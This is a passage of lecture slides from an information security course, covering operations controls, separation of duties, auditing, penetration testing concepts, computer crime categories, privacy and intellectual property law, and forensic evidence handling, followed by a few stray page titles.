– Apple Talk Remote Access Resolution Protocol– NetBios Frame Protocol Control Protocol– Netware Asynchronous Services Interface– X.25 PAD Connection

ITEC5611

S. Kungpisdan119

Honeypots

• Production systems (e.g., firewalls, routers, Web servers, database servers) designed to do real work but that are watched and studied as network intrusions occur

ITEC5611

S. Kungpisdan120

Layered Security

ITEC5611

S. Kungpisdan121

Outline



ITEC5611

S. Kungpisdan122

Asset, Vulnerability, Threat

• Asset – anything that is a computer resource (i.e. software data)

• Vulnerability – weakness in a system that enables security to be violated (i.e. Weak Segregation of duties)

• Threat – an event that could cause harm by violating the security ( i.e. Operator abuse of privileges)

ITEC5611

S. Kungpisdan123

CIA

• Confidentiality – operations controls affect confidentiality of data.

• Integrity – how well operations controls are implemented affects data integrity

• Availability – fault tolerance and ability to recover

ITEC5611

S. Kungpisdan124

Controls and Protections

• Controls to protect hardware, software and media from:– Threats in an operating environment– Internal and external intruders– Operators inappropriately accessing

resources

ITEC5611

S. Kungpisdan125

Categories of Controls

• Preventative – prevent harmful occurrence– Lower amount and impact of errors entering the

system– Prevent unauthorized intruders from accessing the

system

• Detective – detect after harmful occurrence– Track unauthorized transactions

• Corrective – restore after harmful occurrence– Data recovery

ITEC5611

S. Kungpisdan126

Separation of Duties

• Assign different tasks to different personnel• No single person can completely compromise a system• Related to the concept of least privileges – least

privileges required to do one’s job• Secure Systems - System Administrator and Security

Administrator must be different roles.• Highly Secure Systems - System Administrator, Security

Administrator, and Enhanced Operator must be different roles.

ITEC5611

S. Kungpisdan127

System Administrator Functions

• Installing software• Start up and shut down of system• Adding removing users• Performing back up and recovery• Handling printers and queues

ITEC5611

S. Kungpisdan128

Security Administrator Functions

• Setting user clearances, initial passwords and other security characteristics for new users

• Changing security profiles for users• Setting file sensitivity labels• Setting security of devices• Renewing audit data

ITEC5611

S. Kungpisdan129

Least Privilege

• No access beyond job requirements

• Group level privileges for Operators– Read Only– Read /Write - usually copies of original data– Access Change – make changes to original

data

ITEC5611

S. Kungpisdan130

Operation Controls

• Resource Protection

• Hardware Controls

• Software Controls

ITEC5611

S. Kungpisdan131

Resource Protection

• Protecting Resources from disclosure alteration or misuse– Hardware – routers, firewalls, computers,

printers– Software – libraries, vendor software, OS

software– Data Resource – backup data, user data, logs

ITEC5611

S. Kungpisdan132

Hardware Controls

• Hardware Maintenance– Requires physical and logical access by support and vendors– Supervision of vendors and maintenance, background checks

• Maintenance Accounts– Disable maintenance accounts when not needed– Rename default passwords

• Diagnostic Port Control– Specific ports for maintenance– Should be blocked from external access

• Hardware Physical Controls – require locks and alarms– Sensitive operator terminals– Media storage rooms– Server and communications equipment– Modem pools and circuit rooms

ITEC5611

S. Kungpisdan133

Software Controls

• Anti-virus Management – prevent download of viruses

• Software Testing – formal rigid software testing process

• Software Utilities – control of powerful utilities• Safe software Storage – prevent modification of

software and copies of backups• Back up Controls – test and restore backups

ITEC5611

S. Kungpisdan134

Physical Protection

• Protection from physical access– Hardware – routers, firewalls, computers, printers– Software – libraries, vendor software, OS software

• Physical piggybacking – following an authorized person through a door

ITEC5611

S. Kungpisdan135

Monitoring and Audits

• Monitoring – problem identification and resolution

• Monitor for:– Illegal Software Installation– Hardware Faults– Error States– Operational Events

ITEC5611

S. Kungpisdan136

Penetration Testing

• Testing a networks defenses by using the same techniques as external intruders– Scanning and Probing – port scanners– Demon Dialing – war dialing for modems– Sniffing – capture data packets– Dumpster Diving – searching paper disposal areas– Social Engineering – most common, get information

by asking

ITEC5611

S. Kungpisdan137

Auditing

• IT Auditors Audit:– Backup Controls– System and Transaction Controls– Data Library Controls– Systems Development Standards– Data Center Security– Contingency Plans

ITEC5611

S. Kungpisdan138

Audit Trails

• Enables tracking of history of modifications, deletions, additions.

• Allow for accountability• Audit logs should record:

– Transaction time and date– Who processed transaction– Which terminal was used– Various security events relating to transaction

ITEC5611

S. Kungpisdan139

Illegal Computer Operations

• Eavesdropping – sniffing, dumpster diving, social engineering

• Fraud – collusion, falsified transactions• Theft – information or trade secrets, physical

hardware and software theft• Sabotage – Denial of Service (DoS), production

delays• External Attacks – malicious cracking, scanning,

war dialing

ITEC5611

S. Kungpisdan140

Outline



ITEC5611

S. Kungpisdan141

Computer Crimes

• Crimes against the computer

• Crimes using a computer

ITEC5611

S. Kungpisdan142

Most Common Crimes

• Denial of Service (DoS)• Theft or passwords • Network Intrusions• Emanation Eavesdropping• Social Engineering• Illegal Content of Material -

porn• Fraud – using computer to

perpetuate crimes, i.e. auctions of non-existent merchandise

• Software Piracy• Dumpster Diving• Malicious Code• Spoofing of IP Addresses

• Information Warfare – attacking infrastructure of a Nation, including military and power grid

• Destruction or alteration of information

• Use of readily available Attack Scripts – Script Kiddies, unskilled users

• Masquerading• Embezzlement – Illegally

acquiring funds• Data-Diddling – modification of

data• Terrorism

ITEC5611

S. Kungpisdan143

Intellectual Property Law

• Patent – Provides owner legally enforceable right to exclude others for specified time (U.S. 17 years)

• Copyright – Protects original works of authorship, can be used for software and databases

• Trade Secret – Secures confidentiality of proprietary technical and business related information– Company must meet requirements:

• Invested resources to develop the information• Valuable to the business• Valuable to competitor• Non-obvious information

• Trademark – establishes word, name, symbol, color or sounds used to identify and distinguish goods

ITEC5611

S. Kungpisdan144

Information Privacy Laws

• Intent varies widely from country to country• European Union - has developed more

protective laws for individual privacy– Transfer of data from EU to US is prohibited unless

equivalent protections are in place

ITEC5611

S. Kungpisdan145

Electronic Monitoring

• Keystroke monitoring, e-mail monitoring, surveillance cameras, badges and magnetic card keys all allow monitoring of individuals.

• Key to monitoring: Must be done in a lawful manner in a consistent fashion

ITEC5611

S. Kungpisdan146

E-mail monitoring

• Inform users that all e-mail is being monitored by displaying log-on banner– Banner should state: logging on to system consents

user to being monitored. Unauthorized access is prohibited. Subject to prosecution.

• Ensure monitoring is uniformly applied• Explain acceptable use• Explain who can read e-mail and how long it is

backed up• No guarantee of privacy

ITEC5611

S. Kungpisdan147

Computer Forensics

• Collecting information from and about computer systems that is admissible in a court of law.

ITEC5611

S. Kungpisdan148

Evidence Life Cycle

• Discovery and recognition• Protection• Recording• Collection

– Collect all relevant storage media– Make image of hard disk before removing power– Print out screen– Avoid degaussing equipment

• Identification (tagging and marking)• Preservation

– Protect from magnetic erasure– Store in proper environment

• Transportation• Presentation in court• Return to evidence owner

ITEC5611

S. Kungpisdan149

Conducting the Investigation

• Corporate investigation should include Management, corporate security, Human Resources, legal department and other appropriate staff.

• Committee should be set up before hand to address the following issues:– Establishing liaison with law enforcement– Deciding when and if to bring in law enforcement (FBI and

Secret Service)– Setting up means of reporting computer crimes– Establishing procedures for handling reports of computer crimes– Planning and conducting investigations– Involving senior management and corporate security, Human

Resources, the legal dept.– Ensuring proper collection of evidence

ITEC5611

S. Kungpisdan150

Good Sources of Evidence

• Telephone records• Video cameras• Audit trails• System logs• System backups• Witnesses• Results of surveillance• E-mails

ITEC5611

S. Kungpisdan151

MOM

• Motive

• Opportunity

• Means

ITEC5611

S. Kungpisdan152

Interview

• If interviewing do not give information away to suspect

• Questions should be scripted

• Don’t use original documents in the interview

Questions?

ec architectural framework and ec security lecture 7 supakorn kungpisdan

Documents

electronic payment systemspost

electronic commerceneed

web http servicethe

ec securitylecture

smimesecurity protocols

local area networks

host devices

banking investments